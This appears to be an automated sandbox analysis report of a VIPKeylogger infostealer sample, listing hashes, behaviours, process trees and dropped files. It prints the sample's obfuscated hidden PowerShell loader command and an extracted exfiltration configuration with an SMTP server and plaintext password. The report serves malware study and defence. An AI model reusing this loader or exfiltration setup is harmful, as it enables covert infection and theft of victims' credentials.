Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 12:20
Static task
static1
Behavioral task
behavioral1
Sample
001_215_EA2047939_202410210815.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
001_215_EA2047939_202410210815.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kontokurantens.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
Kontokurantens.ps1
Resource
win10v2004-20241007-en
General
-
Target
001_215_EA2047939_202410210815.exe
-
Size
867KB
-
MD5
25da279ad7ee7cc3b8d3e5cd5aa4b5b2
-
SHA1
d1fc6cbe8d8cca235ed29de6b109a0cb951eb5f3
-
SHA256
963d35a92ffdbbdd35c71fc392a73ce49e242ca1b80f94204ef714cc42bbf8d0
-
SHA512
db074cfe6c006f194b8b4ca983fb83a88229beb229504c8eba07140fe490974e90dfe75b66b9c4d81bd319fdaaccc822473064771b7ac8d333012859f139498e
-
SSDEEP
12288:l9Zwb4/I1H06OdtVQuqilUSDFOIBETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0W:/dPFtVtOIB+alCJmvulW6Nd0vu
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.fr - Port:
587 - Username:
[email protected] - Password:
Jc.2o3o@ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 1436 powershell.exe 2660 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 13 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 32 4360 msiexec.exe 33 4372 msiexec.exe 36 4372 msiexec.exe 37 4360 msiexec.exe 42 4360 msiexec.exe 43 4372 msiexec.exe 53 4372 msiexec.exe 54 4360 msiexec.exe 57 4360 msiexec.exe 58 4372 msiexec.exe 67 4360 msiexec.exe 69 4360 msiexec.exe 73 4360 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 66 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 4360 msiexec.exe 4372 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 1436 powershell.exe 2660 powershell.exe 4360 msiexec.exe 4372 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1400 4372 WerFault.exe msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
001_215_EA2047939_202410210815.exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 001_215_EA2047939_202410210815.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 1436 powershell.exe 2660 powershell.exe 1436 powershell.exe 2660 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 1436 powershell.exe 4360 msiexec.exe 4360 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 2660 powershell.exe 1436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeIncreaseQuotaPrivilege 1436 powershell.exe Token: SeSecurityPrivilege 1436 powershell.exe Token: SeTakeOwnershipPrivilege 1436 powershell.exe Token: SeLoadDriverPrivilege 1436 powershell.exe Token: SeSystemProfilePrivilege 1436 powershell.exe Token: SeSystemtimePrivilege 1436 powershell.exe Token: SeProfSingleProcessPrivilege 1436 powershell.exe Token: SeIncBasePriorityPrivilege 1436 powershell.exe Token: SeCreatePagefilePrivilege 1436 powershell.exe Token: SeBackupPrivilege 1436 powershell.exe Token: SeRestorePrivilege 1436 powershell.exe Token: SeShutdownPrivilege 1436 powershell.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeSystemEnvironmentPrivilege 1436 powershell.exe Token: SeRemoteShutdownPrivilege 1436 powershell.exe Token: SeUndockPrivilege 1436 powershell.exe Token: SeManageVolumePrivilege 1436 powershell.exe Token: 33 1436 powershell.exe Token: 34 1436 powershell.exe Token: 35 1436 powershell.exe Token: 36 1436 powershell.exe Token: SeIncreaseQuotaPrivilege 2660 powershell.exe Token: SeSecurityPrivilege 2660 powershell.exe Token: SeTakeOwnershipPrivilege 2660 powershell.exe Token: SeLoadDriverPrivilege 2660 powershell.exe Token: SeSystemProfilePrivilege 2660 powershell.exe Token: SeSystemtimePrivilege 2660 powershell.exe Token: SeProfSingleProcessPrivilege 2660 powershell.exe Token: SeIncBasePriorityPrivilege 2660 powershell.exe Token: SeCreatePagefilePrivilege 2660 powershell.exe Token: SeBackupPrivilege 2660 powershell.exe Token: SeRestorePrivilege 2660 powershell.exe Token: SeShutdownPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeSystemEnvironmentPrivilege 2660 powershell.exe Token: SeRemoteShutdownPrivilege 2660 powershell.exe Token: SeUndockPrivilege 2660 powershell.exe Token: SeManageVolumePrivilege 2660 powershell.exe Token: 33 2660 powershell.exe Token: 34 2660 powershell.exe Token: 35 2660 powershell.exe Token: 36 2660 powershell.exe Token: SeDebugPrivilege 4360 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
001_215_EA2047939_202410210815.exepowershell.exepowershell.exedescription pid process target process PID 5088 wrote to memory of 1436 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 5088 wrote to memory of 1436 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 5088 wrote to memory of 1436 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 5088 wrote to memory of 2660 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 5088 wrote to memory of 2660 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 5088 wrote to memory of 2660 5088 001_215_EA2047939_202410210815.exe powershell.exe PID 1436 wrote to memory of 4360 1436 powershell.exe msiexec.exe PID 1436 wrote to memory of 4360 1436 powershell.exe msiexec.exe PID 1436 wrote to memory of 4360 1436 powershell.exe msiexec.exe PID 2660 wrote to memory of 4372 2660 powershell.exe msiexec.exe PID 2660 wrote to memory of 4372 2660 powershell.exe msiexec.exe PID 2660 wrote to memory of 4372 2660 powershell.exe msiexec.exe PID 2660 wrote to memory of 4372 2660 powershell.exe msiexec.exe PID 1436 wrote to memory of 4360 1436 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"C:\Users\Admin\AppData\Local\Temp\001_215_EA2047939_202410210815.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Seppo=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kontokurantens.Unc';$Underviseren=$Seppo.SubString(52189,3);.$Underviseren($Seppo)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 20244⤵
- Program crash
PID:1400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4372 -ip 43721⤵PID:2444
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD59de7476fdc0bdfcc7b78c40eb0b7ae9c
SHA1e95ecafe1e4f0da7b4cd6d238d75d367f7c9b5cc
SHA2568f4a054cea59ba5bc892962f7ee8c79dafd4ea7e182af0d7fbe3ce89f93750bc
SHA5125bc6682c81b5cdea27a198215d02df7e64a53ca5c92d272d2b1140d32deea3d112b596e8eb35e6f79dc609964a32dab6a4ef83b3845b1057b86bd17537cd2cc2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5d27e8f4f186e50ed883dc1676cbb4038
SHA14dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
SHA256ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
SHA5123f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5fff9aba6fe7a03ac24297af4a6ef7600
SHA17ed4438da3b2bd2080a577c149f0029337d68fe8
SHA256510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
SHA51286b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5289f70c79cd3e954b833d33501de9a2e
SHA1b3c2ad1f1ae4c0a85d7b1272c585b9de545a0d89
SHA25674d592f8d989fb63e5b732028d7101f66e773654d69421c4a7fd9447afe52446
SHA51267f49c543241a5125fdc42d29968d0f68c7a4534fae3836be853320f129c4868a6f109d2e0f6ac17604f8b16fbf55123be053700c555b0cddaebf262f696e81d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5314e6c7a9b2e8e977c3012ae2c92a73d
SHA115ed7eafddb45c2063bda843c7aef3b1abaa415e
SHA256b8f830c056f20d40288d3601c6ec2b796649c3121c77f143a7f9571c18c9dc8d
SHA512473f176d407fe41231a53e4ef190ab87a72ee7bfb0b6ee368b6782a08c57341f70181c26429554196e410c3f2cc7692306f4166a7ad915bde02f0d99bb095882
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5831bfa8c46326829da481ddf47de6750
SHA17e533e3733c928714e38c056e50c44520acae93a
SHA256615559aa045cc3bb50ebffbc7545a70068a9533f118204f420599758f3b48733
SHA5124279da0c01b155cccf59247ce0c71a23e886553be01fa19302fcb71d97f7a2c011ff392286724e6cad6ffe3dcd5fff7b42b5156423a3bcac47c8a285eb400be6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5f002a947c787884888e16ffbeb09413c
SHA143aecaed52d8cc065e9b733071a6b3fe4af7b945
SHA256997782a3f7b46a9b0e8dbcd1fef717fcd4ec910277790e656aa66bb422ce363b
SHA5122bc953481bcf7b6a62d9b0950b762bb1eee60f6c701115577248df1d64ecf90f23a7de38ae50c2e5ae91641318dbaa9287600c270eaeb44fd4e18a7b7a6436d1
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
334KB
MD58dc34d1e450d9695f44738379365b189
SHA19e77d26860ba038a647b6670fd0ddd2c961d0666
SHA256fb8575b17a714bab821f43e25454975876348a6ccf9fb580f25351311d09690b
SHA512f842056d5dcd6f43c88ff6ba91eb6207d3fa48b4e38f050a756fbe3d281cf8483def8a4221f63407953d589be05a7505c31fc6df12a0ed77dd64581e27722f08
-
Filesize
50KB
MD58a4da8bab6993bc24f8ba89b1a5035ba
SHA10266616ebaff76b9027bdf4a52742bbb6d7dbf90
SHA256d19add8d848501931650d9c2f77d4519b15ffe2399a161dac88ea99c07f1b62d
SHA5121f604a65b0fb4543feab6eb9584aab3c47c5ebcabf251492c7be827e3c5d547f310ff05354bf30837fe8192be427c1855ec22783a0be14db15b40b1f05a13c50